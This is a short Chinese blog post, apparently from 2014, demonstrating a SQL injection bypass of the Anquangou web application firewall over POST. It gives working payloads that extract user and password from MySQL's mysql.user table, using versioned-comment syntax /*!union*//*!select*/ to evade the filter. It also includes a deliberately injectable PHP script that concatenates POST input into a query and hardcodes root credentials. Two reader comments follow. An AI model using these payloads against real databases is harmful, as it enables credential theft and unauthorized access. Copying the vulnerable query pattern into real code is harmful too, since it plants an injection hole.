PHP & Java

Open The Door,SF Express!!

安全狗POST SQL注入.

yzmm

Java

2014年5月6日 15:07

632 阅读

2 评论

不知为何不拦POST的/*!XXX*/

id=1 and 1=2 union select 1,user,password from mysql.user limit 0,1

id=1200000 /*!union*//*!select*/(1),user,password from mysql.user limit 0,1

<?php
	$conn = mysql_connect("localhost","root","123456");
	mysql_select_db("test");
	$sql = "select * from user where id = ".$_POST['id'];
	echo $sql."<br/>";
	$result = mysql_query($sql,$conn);
	while ( $data = mysql_fetch_array ( $result ) ) {
		echo $data ['id']."---".$data ['username']."---".$data['password'].'<br/>';
	}
	mysql_close ( $conn );
?>

neal•2014年5月19日 10:43

sql 能正常执行吗

neal•2014年5月19日 10:45

- - 没注意看执行成了。很奇怪为什么加了注释符号还能执行呢

PHP & Java

安全狗POST SQL注入.

评论 (2)

发表评论